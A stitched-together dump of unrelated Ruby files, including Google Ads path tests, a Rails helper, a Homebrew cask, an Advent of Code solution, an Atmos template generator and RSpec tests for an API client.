assert_equal(expected, util.feed_placeholder_view(1234, 5678))
expected = 'customers/1234/feeds/5678'
assert_equal(expected, util.feed(1234, 5678))
expected = 'geoTargetConstants/123456'
assert_equal(expected, util.geo_target_constant(123456))
expected = 'customers/1234/geographicViews/567~890'
assert_equal(expected, util.geographic_view(1234, 567, 890))
expected = 'googleAdsFields/test_field'
assert_equal(expected, util.google_ads_field('test_field'))
expected = 'customers/1234/groupPlacementViews/567~890'
assert_equal(expected, util.group_placement_view(1234, 567, 890))
expected = 'customers/1234/hotelGroupViews/567~890'
assert_equal(expected, util.hotel_group_view(1234, 567, 890))
expected = 'customers/123456/hotelPerformanceView'
assert_equal(expected, util.hotel_performance_view(123456))
expected = 'customers/1234/incomeRangeViews/567~890'
assert_equal(expected, util.income_range_view(1234, 567, 890))
expected = 'customers/1234/keywordPlanAdGroups/5678'
assert_equal(expected, util.keyword_plan_ad_group(1234, 5678))
expected = 'customers/1234/keywordPlanAdGroupKeywords/5678'
assert_equal(expected, util.keyword_plan_ad_group_keyword(1234, 5678))
expected = 'customers/1234/keywordPlanCampaigns/5678'
assert_equal(expected, util.keyword_plan_campaign(1234, 5678))
expected = 'customers/1234/keywordPlanCampaignKeywords/5678'
assert_equal(expected, util.keyword_plan_campaign_keyword(1234, 5678))
expected = 'customers/1234/keywordPlans/5678'
assert_equal(expected, util.keyword_plan(1234, 5678))
expected = 'customers/1234/keywordViews/567~890'
assert_equal(expected, util.keyword_view(1234, 567, 890))
expected = 'customers/1234/labels/5678'
assert_equal(expected, util.label(1234, 5678))
expected = 'languageConstants/123456'
assert_equal(expected, util.language_constant(123456))
expected = 'customers/1234/locationViews/567~890'
assert_equal(expected, util.location_view(1234, 567, 890))
expected = 'customers/1234/managedPlacementViews/567~890'
assert_equal(expected, util.managed_placement_view(1234, 567, 890))
expected = 'customers/1234/mediaFiles/5678'
assert_equal(expected, util.media_file(1234, 5678))
expected = 'customers/1234/merchantCenterLinks/5678'
assert_equal(expected, util.merchant_center_link(1234, 5678))
expected = 'mobileAppCategoryConstants/123456'
assert_equal(expected, util.mobile_app_category_constant(123456))
expected = 'mobileDeviceConstants/123456'
assert_equal(expected, util.mobile_device_constant(123456))
expected = 'operatingSystemVersionConstants/123456'
assert_equal(expected, util.operating_system_version_constant(123456))
expected = 'customers/1234/parentalStatusViews/567~890'
assert_equal(expected, util.parental_status_view(1234, 567, 890))
expected = 'productBiddingCategoryConstants/123~456~789'
assert_equal(expected, util.product_bidding_category_constant(123, 456,
789))
expected = 'customers/1234/productGroupViews/567~890'
assert_equal(expected, util.product_group_view(1234, 567, 890))
expected = 'customers/1234/recommendations/5678'
assert_equal(expected, util.recommendation(1234, 5678))
expected = 'customers/1234/remarketingActions/5678'
assert_equal(expected, util.remarketing_action(1234, 5678))
expected = 'customers/1234/searchTermViews/56~78~90'
assert_equal(expected, util.search_term_view(1234, 56, 78, 90))
expected = 'customers/1234/sharedCriteria/567~890'
assert_equal(expected, util.shared_criterion(1234, 567, 890))
expected = 'customers/1234/sharedSets/5678'
assert_equal(expected, util.shared_set(1234, 5678))
expected = 'customers/1234/shoppingPerformanceView'
assert_equal(expected, util.shopping_performance_view(1234))
expected = 'customers/1234/thirdPartyAppAnalyticsLinks/5678'
assert_equal(expected, util.third_party_app_analytics_link(1234, 5678))
expected = 'topicConstants/123456'
assert_equal(expected, util.topic_constant(123456))
expected = 'customers/1234/topicViews/567~890'
assert_equal(expected, util.topic_view(1234, 567, 890))
expected = 'customers/1234/userInterests/5678'
assert_equal(expected, util.user_interest(1234, 5678))
expected = 'customers/1234/userLists/5678'
assert_equal(expected, util.user_list(1234, 5678))
expected = 'customers/1234/videos/5678'
assert_equal(expected, util.video(1234, 5678))
end
def test_path_generation_v6()
util = Google::Ads::GoogleAds::Utils::V6::PathLookupUtil.new
expected = 'customers/1234/accountBudgetProposals/5678'
assert_equal(expected, util.account_budget_proposal(1234, 5678))
expected = 'customers/1234/accountBudgets/5678'
assert_equal(expected, util.account_budget(1234, 5678))
expected = 'customers/1234/accountLinks/5678'
assert_equal(expected, util.account_link(1234, 5678))
expected = 'customers/1234/adGroupAdLabels/56~78~90'
assert_equal(expected, util.ad_group_ad_label(1234, 56, 78, 90))
expected = 'customers/1234/adGroupAds/567~890'
assert_equal(expected, util.ad_group_ad(1234, 567, 890))
expected = 'customers/1234/adGroupAudienceViews/567~890'
assert_equal(expected, util.ad_group_audience_view(1234, 567, 890))
expected = 'customers/1234/adGroupBidModifiers/567~890'
assert_equal(expected, util.ad_group_bid_modifier(1234, 567, 890))
expected = 'customers/1234/adGroupCriterionLabels/56~78~90'
assert_equal(expected, util.ad_group_criterion_label(1234, 56, 78, 90))
expected = 'customers/1234/adGroupCriteria/567~890'
assert_equal(expected, util.ad_group_criterion(1234, 567, 890))
expected = 'customers/1234/adGroupCriterionSimulations/5~6~7~8~9~0'
assert_equal(expected, util.ad_group_criterion_simulation(1234, 5, 6, 7, 8, 9, 0))
expected = 'customers/1234/adGroupExtensionSettings/567~890'
assert_equal(expected, util.ad_group_extension_setting(1234, 567, 890))
expected = 'customers/1234/adGroupFeeds/567~890'
assert_equal(expected, util.ad_group_feed(1234, 567, 890))
expected = 'customers/1234/adGroupLabels/567~890'
assert_equal(expected, util.ad_group_label(1234, 567, 890))
expected = 'customers/1234/adGroups/5678'
assert_equal(expected, util.ad_group(1234, 5678))
expected = 'customers/1234/adGroupSimulations/5~6~7~8~9'
assert_equal(expected, util.ad_group_simulation(1234, 5, 6, 7, 8, 9))
expected = 'customers/1234/adParameters/56~78~90'
assert_equal(expected, util.ad_parameter(1234, 56, 78, 90))
expected = 'customers/1234/adScheduleViews/567~890'
assert_equal(expected, util.ad_schedule_view(1234, 567, 890))
expected = 'customers/1234/ageRangeViews/567~890'
assert_equal(expected, util.age_range_view(1234, 567, 890))
expected = 'customers/1234/assets/5678'
assert_equal(expected, util.asset(1234, 5678))
expected = 'customers/1234/batchJobs/5678'
assert_equal(expected, util.batch_job(1234, 5678))
expected = 'customers/1234/biddingStrategies/5678'
assert_equal(expected, util.bidding_strategy(1234, 5678))
expected = 'customers/1234/billingSetups/5678'
assert_equal(expected, util.billing_setup(1234, 5678))
expected = 'customers/1234/campaignAudienceViews/567~890'
assert_equal(expected, util.campaign_audience_view(1234, 567, 890))
expected = 'customers/1234/campaignDrafts/567~890'
assert_equal(expected, util.campaign_draft(1234, 567, 890))
expected = 'customers/1234/campaignBidModifiers/567~890'
assert_equal(expected, util.campaign_bid_modifier(1234, 567, 890))
expected = 'customers/1234/campaignExperiments/5678'
assert_equal(expected, util.campaign_experiment(1234, 5678))
expected = 'customers/1234/campaignBudgets/5678'
assert_equal(expected, util.campaign_budget(1234, 5678))
expected = 'customers/1234/campaignCriteria/567~890'
assert_equal(expected, util.campaign_criterion(1234, 567, 890))
expected = 'customers/1234/campaignCriterionSimulations/5~6~7~8~9~0'
assert_equal(expected, util.campaign_criterion_simulation(1234, 5, 6, 7, 8, 9, 0))
expected = 'customers/1234/campaignExtensionSettings/567~890'
assert_equal(expected, util.campaign_extension_setting(1234, 567, 890))
expected = 'customers/1234/campaignFeeds/567~890'
assert_equal(expected, util.campaign_feed(1234, 567, 890))
expected = 'customers/1234/campaignLabels/567~890'
assert_equal(expected, util.campaign_label(1234, 567, 890))
expected = 'customers/1234/campaignSharedSets/567~890'
assert_equal(expected, util.campaign_shared_set(1234, 567, 890))
expected = 'customers/1234/campaigns/5678'
assert_equal(expected, util.campaign(1234, 5678))
expected = 'carrierConstants/123456'
assert_equal(expected, util.carrier_constant(123456))
expected = 'customers/1234/changeStatus/5678'
assert_equal(expected, util.change_status(1234, 5678))
expected = 'customers/1234/clickViews/567~890'
assert_equal(expected, util.click_view(1234, 567, 890))
expected = 'customers/1234/combinedAudiences/5678'
assert_equal(expected, util.combined_audience(1234, 5678))
expected = 'customers/1234/conversionActions/5678'
assert_equal(expected, util.conversion_action(1234, 5678))
expected = 'currencyConstants/123456'
assert_equal(expected, util.currency_constant(123456))
expected = 'customers/1234/customAudiences/5678'
assert_equal(expected, util.custom_audience(1234, 5678))
expected = 'customers/1234/customInterests/5678'
assert_equal(expected, util.custom_interest(1234, 5678))
expected = 'customers/1234/customerClientLinks/567~890'
assert_equal(expected, util.customer_client_link(1234, 567, 890))
expected = 'customers/1234/customerClients/5678'
assert_equal(expected, util.customer_client(1234, 5678))
expected = 'customers/1234/customerExtensionSettings/5678'
assert_equal(expected, util.customer_extension_setting(1234, 5678))
expected = 'customers/1234/customerFeeds/5678'
assert_equal(expected, util.customer_feed(1234, 5678))
expected = 'customers/1234/customerLabels/5678'
assert_equal(expected, util.customer_label(1234, 5678))
expected = 'customers/1234/customerManagerLinks/567~890'
assert_equal(expected, util.customer_manager_link(1234, 567, 890))
expected = 'customers/1234/customerNegativeCriteria/5678'
assert_equal(expected, util.customer_negative_criterion(1234, 5678))
expected = 'customers/1234/customerUserAccesses/5678'
assert_equal(expected, util.customer_user_access(1234, 5678))
expected = 'customers/123456'
assert_equal(expected, util.customer(123456))
expected = 'customers/1234/detailPlacementViews/567~890'
assert_equal(expected, util.detail_placement_view(1234, 567, 890))
expected = 'customers/1234/displayKeywordViews/567~890'
assert_equal(expected, util.display_keyword_view(1234, 567, 890))
expected = 'customers/1234/domainCategories/56~78~90'
assert_equal(expected, util.domain_category(1234, 56, 78, 90))
expected = 'customers/1234/dynamicSearchAdsSearchTermViews/5~6~7~8~9'
assert_equal(expected, util.dynamic_search_ads_search_term_view(1234, 5, 6,
7, 8, 9))
expected = 'customers/1234/expandedLandingPageViews/5678'
assert_equal(expected, util.expanded_landing_page_view(1234, 5678))
expected = 'customers/1234/extensionFeedItems/5678'
assert_equal(expected, util.extension_feed_item(1234, 5678))
expected = 'customers/1234/feedItems/567~890'
assert_equal(expected, util.feed_item(1234, 567, 890))
expected = 'customers/1234/feedItemSetLinks/56~78~90'
assert_equal(expected, util.feed_item_set_link(1234, 56, 78, 90))
expected = 'customers/1234/feedItemSets/567~890'
assert_equal(expected, util.feed_item_set(1234, 567, 890))
expected = 'customers/1234/feedItemTargets/5~6~7~8'
assert_equal(expected, util.feed_item_target(1234, 5, 6, 7, 8))
expected = 'customers/1234/feedMappings/567~890'
assert_equal(expected, util.feed_mapping(1234, 567, 890))
expected = 'customers/1234/feedPlaceholderViews/5678'
assert_equal(expected, util.feed_placeholder_view(1234, 5678))
expected = 'customers/1234/feeds/5678'
assert_equal(expected, util.feed(1234, 5678))
expected = 'geoTargetConstants/123456'
assert_equal(expected, util.geo_target_constant(123456))
expected = 'customers/1234/geographicViews/567~890'
assert_equal(expected, util.geographic_view(1234, 567, 890))
expected = 'googleAdsFields/test_field'
assert_equal(expected, util.google_ads_field('test_field'))
expected = 'customers/1234/groupPlacementViews/567~890'
assert_equal(expected, util.group_placement_view(1234, 567, 890))
expected = 'customers/1234/hotelGroupViews/567~890'
assert_equal(expected, util.hotel_group_view(1234, 567, 890))
expected = 'customers/123456/hotelPerformanceView'
assert_equal(expected, util.hotel_performance_view(123456))
expected = 'customers/1234/incomeRangeViews/567~890'
assert_equal(expected, util.income_range_view(1234, 567, 890))
expected = 'customers/1234/keywordPlanAdGroups/5678'
assert_equal(expected, util.keyword_plan_ad_group(1234, 5678))
expected = 'customers/1234/keywordPlanAdGroupKeywords/5678'
assert_equal(expected, util.keyword_plan_ad_group_keyword(1234, 5678))
expected = 'customers/1234/keywordPlanCampaigns/5678'
assert_equal(expected, util.keyword_plan_campaign(1234, 5678))
expected = 'customers/1234/keywordPlanCampaignKeywords/5678'
assert_equal(expected, util.keyword_plan_campaign_keyword(1234, 5678))
expected = 'customers/1234/keywordPlans/5678'
assert_equal(expected, util.keyword_plan(1234, 5678))
expected = 'customers/1234/keywordViews/567~890'
assert_equal(expected, util.keyword_view(1234, 567, 890))
expected = 'customers/1234/labels/5678'
assert_equal(expected, util.label(1234, 5678))
expected = 'languageConstants/123456'
assert_equal(expected, util.language_constant(123456))
expected = 'customers/1234/locationViews/567~890'
assert_equal(expected, util.location_view(1234, 567, 890))
expected = 'customers/1234/managedPlacementViews/567~890'
assert_equal(expected, util.managed_placement_view(1234, 567, 890))
expected = 'customers/1234/mediaFiles/5678'
assert_equal(expected, util.media_file(1234, 5678))
expected = 'customers/1234/merchantCenterLinks/5678'
assert_equal(expected, util.merchant_center_link(1234, 5678))
expected = 'mobileAppCategoryConstants/123456'
assert_equal(expected, util.mobile_app_category_constant(123456))
expected = 'mobileDeviceConstants/123456'
assert_equal(expected, util.mobile_device_constant(123456))
expected = 'operatingSystemVersionConstants/123456'
assert_equal(expected, util.operating_system_version_constant(123456))
expected = 'customers/1234/parentalStatusViews/567~890'
assert_equal(expected, util.parental_status_view(1234, 567, 890))
expected = 'productBiddingCategoryConstants/123~456~789'
assert_equal(expected, util.product_bidding_category_constant(123, 456,
789))
expected = 'customers/1234/productGroupViews/567~890'
assert_equal(expected, util.product_group_view(1234, 567, 890))
expected = 'customers/1234/recommendations/5678'
assert_equal(expected, util.recommendation(1234, 5678))
expected = 'customers/1234/remarketingActions/5678'
assert_equal(expected, util.remarketing_action(1234, 5678))
expected = 'customers/1234/searchTermViews/56~78~90'
assert_equal(expected, util.search_term_view(1234, 56, 78, 90))
expected = 'customers/1234/sharedCriteria/567~890'
assert_equal(expected, util.shared_criterion(1234, 567, 890))
expected = 'customers/1234/sharedSets/5678'
assert_equal(expected, util.shared_set(1234, 5678))
expected = 'customers/1234/shoppingPerformanceView'
assert_equal(expected, util.shopping_performance_view(1234))
expected = 'customers/1234/thirdPartyAppAnalyticsLinks/5678'
assert_equal(expected, util.third_party_app_analytics_link(1234, 5678))
expected = 'topicConstants/123456'
assert_equal(expected, util.topic_constant(123456))
expected = 'customers/1234/topicViews/567~890'
assert_equal(expected, util.topic_view(1234, 567, 890))
expected = 'customers/1234/userInterests/5678'
assert_equal(expected, util.user_interest(1234, 5678))
expected = 'customers/1234/userLists/5678'
assert_equal(expected, util.user_list(1234, 5678))
expected = 'customers/1234/videos/5678'
assert_equal(expected, util.video(1234, 5678))
end
def test_malformed_path_input
util = Google::Ads::GoogleAds::Utils::V3::PathLookupUtil.new
assert_raises ArgumentError do
util.campaign(nil, nil)
end
end
end
| 39.66776 | 86 | 0.754172 |
01ccce2cf94b10232c2c529ac914b36d0eab1996 | 970 | require Rails.root.join('app', 'helpers', 'application_helper')
module ApplicationHelper
# Checks the current route using the format 'ControllerName#ActionName'
# Used as a shorter way of calling current_controller and current_action together
# Defaults to using current_page? if the route doesn't include a '#'
def current_route?(route)
return current_page?(route) unless route.include?('#')
controller, action = route.split('#')
current_controller?(controller) && current_action?(action)
end
# Override the Gitlab Promo links with our own Perforce links
def promo_host
'perforce.com'
end
# Override the protocol to HTTP
def promo_url
'http://' + promo_host
end
def help_page_path(*args)
return super(*args) if args.length <= 2
# we've been given more than two segments, so create our own absolute path to the requested help file
'/' + args.unshift('help').map { |arg| CGI.escape(arg) }.join('/')
end
end
| 31.290323 | 105 | 0.713402 |
28eb81cc39819dfd791f7d58d05292a24678a5ac | 528 | module DwollaSwagger
#
class Id < BaseObject
attr_accessor
# attribute mapping from ruby-style variable name to JSON key
def self.attribute_map
{
}
end
# attribute type
def self.swagger_types
{
}
end
def initialize(attributes = {})
return if !attributes.is_a?(Hash) || attributes.empty?
# convert string to symbol for hash key
attributes = attributes.inject({}){|memo,(k,v)| memo[k.to_sym] = v; memo}
end
end
end
| 18.206897 | 79 | 0.587121 |
218b9442cbbc10da0dd06357045cb2dbd23c12fc | 531 | # frozen_string_literal: true
class OtherDoiByIdJob < ApplicationJob
queue_as :lupo_background
# retry_on ActiveRecord::Deadlocked, wait: 10.seconds, attempts: 3
# retry_on Faraday::TimeoutError, wait: 10.minutes, attempts: 3
# discard_on ActiveJob::DeserializationError
rescue_from ActiveJob::DeserializationError,
Elasticsearch::Transport::Transport::Errors::BadRequest do |error|
Rails.logger.error error.message
end
def perform(id, options = {})
Event.import_doi(id, options)
end
end
| 26.55 | 80 | 0.745763 |
287cf2bdd5b7a8f009da67a64a1c5826e29ad6be | 1,028 | class AddEslCategories < ActiveRecord::DataMigration
def up
esl_categories = [
{name: 'Heavy-Duty Large Bus', class_name: 'RevenueVehicle', active: true},
{name: 'Heavy-Duty Small Bus', class_name: 'RevenueVehicle', active: true},
{name: 'Medium-Duty and Purpose-Built Bus', class_name: 'RevenueVehicle', active: true},
{name: 'Light Duty Mid-Sized Bus', class_name: 'RevenueVehicle', active: true},
{name: 'Light Duty Small Bus, Cutaways, and Modified Van', class_name: 'RevenueVehicle', active: true},
{name: 'Electric Trolley-Bus', class_name: 'RevenueVehicle', active: true},
{name: 'Steel-Wheel Trolley', class_name: 'RevenueVehicle', active: true},
{name: 'Ferry', class_name: 'RevenueVehicle', active: true},
{name: 'Rail Vehicle', class_name: 'RevenueVehicle', active: true},
{name: 'Facilities', class_name: 'Facility', active: true},
]
esl_categories.each do |category|
EslCategory.create!(category)
end
end
end | 51.4 | 111 | 0.664397 |
5d3f9cc670ca7bb5497f15389cf7954d56c01c51 | 894 | cask "opera-developer" do
version "78.0.4072.0"
sha256 "62e14a35da67800c6214c16dd4fa37f5653457418c1312a6c7122a4159074022"
url "https://get.geo.opera.com/pub/opera-developer/#{version}/mac/Opera_Developer_#{version}_Setup.dmg"
name "Opera Developer"
desc "Web browser"
homepage "https://www.opera.com/computer/beta"
livecheck do
url "https://get.geo.opera.com/pub/opera-developer/"
strategy :page_match
regex(/href="(\d+(?:\.\d+)*)/i)
end
auto_updates true
app "Opera Developer.app"
zap trash: [
"~/Library/Application Support/com.operasoftware.OperaDeveloper",
"~/Library/Caches/com.operasoftware.OperaDeveloper",
"~/Library/Cookies/com.operasoftware.OperaDeveloper.binarycookies",
"~/Library/Preferences/com.operasoftware.OperaDeveloper.plist",
"~/Library/Saved Application State/com.operasoftware.OperaDeveloper.savedState",
]
end
| 31.928571 | 105 | 0.738255 |
ab7cd9c5eeea325531a9d92af351443c07af44c6 | 3,343 | require_relative 'common'
# Inspired by RubyGems's Gem::List [implem](https://github.com/rubygems/rubygems/blob/master/lib/rubygems/util/list.rb)
class CupCircle
include Enumerable
attr_accessor :tail
attr_reader :value, :tail, :length, :last, :links
def initialize(value, tail = nil)
@value = value
@tail = tail
if tail
@length = tail.length + 1
@last = tail.last
@links = tail.links.tap { |l| l[value] = self }
else
@length = 1
@last = self
@links = { value => self }
end
end
def each
n = self
while n
yield n.value
n = n.tail
end
end
def prepend(value)
raise "Already finalized" if @finalized
self.class.new value, self
end
# Needed because we're a circle
def finalize!
@finalized = true
propagate_final_length
@last.tail = self
end
protected
def propagate_final_length
curr = tail
until curr.nil?
curr.length = self.length
curr = curr.tail
end
end
attr_writer :length
end
class Day23 < AdventDay
def first_part
cups = input
cups.finalize!
end_result = play_game(game_for(cups, number_of_rounds: 100))
circle_start = end_result.links[1]
circle_start.tail.take(cups.length - 1).join
end
def second_part
initial_cups = input
missing = reverse((initial_cups.length+1)..1_000_000)
cups = missing.reduce(initial_cups) { |linked_list, cup| linked_list.prepend(cup) }
cups.finalize!
end_result = play_game(game_for(cups, initial_cup: initial_cups, number_of_rounds: 10_000_000))
start = end_result.links[1]
first_cup = start.tail
second_cup = first_cup.tail
first_cup.value * second_cup.value
end
private
def play_game(game)
game_result = nil
loop do
game_result = game.next
rescue StopIteration
break
end
game_result
end
def game_for(cups, initial_cup: cups, number_of_rounds: 100)
selected = initial_cup
max_val = cups.length
# Assumption: no gaps in cup numerotation
# Assumption: each cup number is distinct
Enumerator.new(number_of_rounds) do |yielder|
number_of_rounds.times do |n|
picked_ups = 3.times.each_with_object([]) do |_, picked_cups|
previous = (picked_cups.last || selected)
picked_cups << previous.tail
end
order = [
reverse(1...selected.value),
reverse(selected.value+1..max_val)
].lazy.flat_map(&:lazy)
picked_up_values = picked_ups.map(&:value)
destination_value = order.find { |to_select| !picked_up_values.include? to_select }
destination = cups.links[destination_value]
selected.tail = picked_ups.last.tail
following = destination.tail
destination.tail = picked_ups.first
picked_ups.last.tail = following
yielder << cups
selected = selected.tail
end
end
end
def reverse(range)
start = range.begin
finish = range.end
offset = range.exclude_end? ? 1 : 0
(finish-offset .. start).step(-1)
end
def convert_data(data)
cups = data.strip.chars.map(&:to_i)
first_val = cups.last
cups[0...-1].
reverse.
reduce(CupCircle.new(first_val)) { |circle, cup| circle.prepend(cup) }
end
end
require "benchmark"
Day23.solve
| 22.741497 | 119 | 0.650015 |
acf1f86c01d78ec20e458a37e633989799ef0e23 | 6,625 | require_relative 'base_command'
require_relative '../../atmos/source_path'
require_relative '../../atmos/generator'
require_relative '../../atmos/utils'
module SimplyGenius
module Atmos
module Commands
# From https://github.com/rubber/rubber/blob/master/lib/rubber/commands/vulcanize.rb
class Generate < BaseCommand
def self.description
<<~EOF
Installs configuration templates used by atmos to create infrastructure
resources e.g.
atmos generate aws/vpc
use --list to get a list of the template names for a given sourceroot
EOF
end
option ["-f", "--force"],
:flag, "Overwrite files that already exist"
option ["-n", "--dryrun"],
:flag, "Run but do not make any changes"
option ["-q", "--quiet"],
:flag, "Supress status output"
option ["-s", "--skip"],
:flag, "Skip files that already exist"
option ["-d", "--[no-]dependencies"],
:flag, "Walk dependencies, or not", default: true
option ["-l", "--list"],
:flag, "list available templates"
option ["-u", "--update"],
:flag, "update all installed templates\n"
option ["-p", "--sourcepath"],
"PATH", "search for templates using given sourcepath",
multivalued: true
option ["-r", "--[no-]sourcepaths"],
:flag, "clear sourcepaths from template search\n", default: true
option ["-c", "--context"],
"CONTEXT", "provide context variables (dot notation)",
multivalued: true
parameter "TEMPLATE ...", "atmos template(s)", required: false
def execute
signal_usage_error "template name is required" if template_list.blank? && ! list? && !update?
sourcepath_list.each do |sp|
SourcePath.register(File.basename(sp), sp)
end
if sourcepaths?
# don't want to fail for new repo
if Atmos.config && Atmos.config.is_atmos_repo?
Atmos.config['atmos.template_sources'].try(:each) do |item|
SourcePath.register(item.name, item.location)
end
end
# Always search for templates against the bundled templates directory
SourcePath.register('bundled', File.expand_path('../../../../../templates', __FILE__))
end
if list?
logger.info "Valid templates are:"
SourcePath.registry.each do |spname, sp|
logger.info("\tSourcepath #{sp}")
filtered_names = sp.template_names.select do |name|
template_list.blank? || template_list.any? {|f| name =~ /#{f}/ }
end
filtered_names.each {|n| logger.info ("\t\t#{n}")}
end
else
g = Generator.new(force: force?,
pretend: dryrun?,
quiet: quiet?,
skip: skip?,
dependencies: dependencies?)
begin
context = SettingsHash.new
context_list.each do |c|
key, value = c.split('=', 2)
context.notation_put(key, value)
end
if update?
# this isn't 100% foolproof, but is a convenience that should help for most cases
filtered_templates = state[:visited_templates].select do |vt|
template_list.blank? || template_list.any? {|n| vt[:name] =~ /#{n}/ }
end
sps = filtered_templates.collect(&:source).uniq
sps.each do |src|
spname = src[:name]
sploc = src[:location]
existing_sp = SourcePath.registry[spname]
if existing_sp
if existing_sp.location != sploc
logger.warn("Saved sourcepath location differs from that in configuration")
logger.warn(" #{spname} -> saved=#{sploc} configured=#{existing_sp.location}")
logger.warn(" consider running with --no-sourcepaths")
end
else
sp = SourcePath.register(spname, sploc)
logger.warn("Saved state contains a source path missing from configuration: #{sp}")
end
end
filtered_templates.each do |vt|
name = vt[:name]
ctx = vt[:context]
spname = vt[:source][:name]
sp = SourcePath.registry[spname]
tmpl = sp.template(name)
tmpl.scoped_context.merge!(ctx) if ctx
tmpl.context.merge!(context)
g.apply_template(tmpl)
end
else
g.generate(*template_list, context: context)
end
save_state(g.visited_templates, template_list)
rescue ArgumentError => e
logger.error(e.message)
exit 1
end
end
end
def state_file
@state_file ||= Atmos.config["atmos.generate.state_file"]
end
def state
@state ||= begin
if state_file.present?
path = File.expand_path(state_file)
yml_hash = {}
if File.exist?(path)
yml_hash = YAML.load_file(path)
end
SettingsHash.new(yml_hash)
else
SettingsHash.new
end
end
end
def save_state(visited_templates, entrypoint_template_names)
if state_file.present?
visited_state = []
visited_templates.each do |tmpl|
visited_tmpl = tmpl.to_h
visited_tmpl[:context] = tmpl.scoped_context.to_h
visited_state << visited_tmpl
end
state[:visited_templates] ||= []
state[:visited_templates].concat(visited_state)
state[:visited_templates].sort! {|h1, h2| h1[:name] <=> h2[:name] }.uniq!
state[:entrypoint_templates] ||= []
state[:entrypoint_templates].concat(entrypoint_template_names)
state[:entrypoint_templates].sort!.uniq!
File.write(state_file, YAML.dump(state.to_hash))
end
end
end
end
end
end
| 35.239362 | 103 | 0.514717 |
260fa90d46fd6e176ec49806290b76ca62c78713 | 8,569 | require './spec/spec_helper'
require './lib/neutrino/api/client'
require 'fakeweb'
require 'net/http'
require 'uri'
describe Neutrino::Api::Client do
before(:each) do
Neutrino::Api::Client.config = TestConfig.to_hash
end
describe 'self.config' do
it 'returns a config dictionary when one has been set' do
expect(described_class.config).to eq(TestConfig.to_hash)
end
end
describe 'self.symbolize_keys' do
context 'given nil' do
let(:hash) { nil }
it 'returns nil' do
expect(described_class.symbolize_keys(hash)).to be_nil
end
end
context 'given an empty Hash' do
let(:hash) { {} }
it 'returns an empty hash' do
expect(described_class.symbolize_keys(hash)).to eq({})
end
end
context 'given a hash with a few strings as keys' do
let(:hash) { { 'foo' => 5, 'bar' => [] } }
it 'returns a hash that has the same number of keys as the passed' do
expect(described_class.symbolize_keys(hash).keys.count).to eq(hash.keys.count)
end
it 'returns a hash where all the keys are strings' do
described_class.symbolize_keys(hash).keys.each { |key| expect(key).to be_an_instance_of(Symbol) }
end
end
end
describe 'self.protocol' do
it 'returns the protocol specified in the config when a config was given' do
expect(described_class.protocol).to eq(TestConfig.protocol)
end
end
describe 'self.host' do
it 'returns the host specified in the config when a config was given' do
expect(described_class.host).to eq(TestConfig.host)
end
end
describe 'self.port' do
it 'returns the port specified in the config when a config was given' do
expect(described_class.port).to eq(TestConfig.port)
end
end
describe 'self.auth_user' do
it 'returns the auth_user specified in the config when a config was given' do
expect(described_class.auth_user).to eq(TestConfig.auth_user)
end
end
describe 'self.auth_pass' do
it 'returns the auth_pass specified in the config when a config was given' do
expect(described_class.auth_pass).to eq(TestConfig.auth_pass)
end
end
describe 'self.user_root' do
it 'returns the user_root specified in the config when a config was given' do
expect(described_class.user_root).to eq(TestConfig.user_root)
end
end
describe 'self.user_extension' do
it 'returns the user_extension specified in the config when a config was given' do
expect(described_class.user_extension).to eq(TestConfig.user_extension)
end
end
describe 'self.api_version' do
it 'returns the api_version specified in the config when a config was given' do
expect(described_class.api_version).to eq(TestConfig.api_version)
end
it 'returns the default api_version when a config was not given' do
described_class.config = nil
expect(described_class.api_version).to eq(described_class::DEFAULT_API_VERSION)
end
it 'returns the default api_version when the given config contains no api_version' do
described_class.config = {}
expect(described_class.api_version).to eq(described_class::DEFAULT_API_VERSION)
end
end
describe 'self.perform_request' do
it 'raises an error when a bogus uri is given' do
expect { described_class.perform_request('/bogus') }.to raise_error
end
let(:mock_http) { Object.new }
let(:not_found_response) { Object.new }
let(:server_error_response) { Object.new }
let(:response_body) { 'I am the response body' }
before(:each) do
allow(mock_http).to receive(:body)
allow(Net::HTTP).to receive(:start).and_yield(mock_http)
allow(not_found_response).to receive(:code).and_return('404')
allow(server_error_response).to receive(:code).and_return('500')
allow(server_error_response).to receive(:body).and_return('')
end
it 'raises "Connection refused" when the http request throws an Errno::ECONNREFUSED' do
allow(mock_http).to receive(:request).and_raise(Errno::ECONNREFUSED)
expect { described_class.perform_request('/bogus') }.to raise_error('Connection refused')
end
it 'raises "Connection refused" when the http request throws an OpenSSL::SSL::SSLError' do
allow(mock_http).to receive(:request).and_raise(OpenSSL::SSL::SSLError)
expect { described_class.perform_request('/bogus') }.to raise_error('Connection refused')
end
end
describe 'self.build_request' do
let(:mock_http) { double }
let(:mock_request) { Net::HTTP::Get }
let(:mock_hmac_id) { 'fake_hmac_id' }
let(:mock_hmac_key) { 'fake_hmac_key' }
let(:fake_path) { 'https://goto:123/api' }
let(:params_with_tid) { { tid: 'optional_tid' } }
let(:empty_params) { {} }
before(:each) do
allow(mock_http).to receive(:body)
allow(Net::HTTP).to receive(:start).and_yield(mock_http)
allow(mock_http).to receive(:request)
allow(described_class).to receive(:hmac_id).and_return(mock_hmac_id)
allow(described_class).to receive(:hmac_key).and_return(mock_hmac_key)
end
context 'HMAC authentication' do
let(:mock_tenant_id) { 'fake_tenant' }
let(:mock_tenant_key) { 'fake_tenant_key' }
context 'without tenant configured' do
before(:each) do
allow(described_class).to receive(:tenant_id).and_return(nil)
allow(described_class).to receive(:tenant_key).and_return(nil)
end
it 'and request has been signed' do
expect(ApiAuth).to receive(:sign!).with(mock_request, mock_hmac_id, mock_hmac_key)
described_class.build_request(fake_path)
end
it 'request has been signed with tid specified in options' do
expect(ApiAuth).to receive(:sign!).with(mock_request, mock_hmac_id, mock_hmac_key)
described_class.build_request(fake_path, params_with_tid)
end
end
context 'with tenant configured' do
before(:each) do
allow(described_class).to receive(:tenant_id).and_return(mock_tenant_id)
allow(described_class).to receive(:tenant_key).and_return(mock_tenant_key)
end
it 'and request has been signed' do
expect(ApiAuth).to receive(:sign!).with(mock_request, mock_hmac_id, anything)
described_class.build_request(fake_path)
end
it 'and request has been signed with tid specified in option hash' do
expect(ApiAuth).to receive(:sign!).with(mock_request, mock_hmac_id, mock_hmac_key)
described_class.build_request(fake_path, params_with_tid)
end
context 'when basic authentication is specified on request' do
it 'should not sign request' do
expect(ApiAuth).to_not receive(:sign!)
described_class.build_request(fake_path, empty_params, nil, true)
end
end
end
context 'without application configured' do
before(:each) do
described_class.config[:hmac_id] = nil
described_class.config[:hmac_key] = nil
end
it 'should not sign request' do
expect(ApiAuth).to_not receive(:sign!)
described_class.build_request(fake_path)
end
end
end
end
describe 'self.get_method' do
let(:options) { {} }
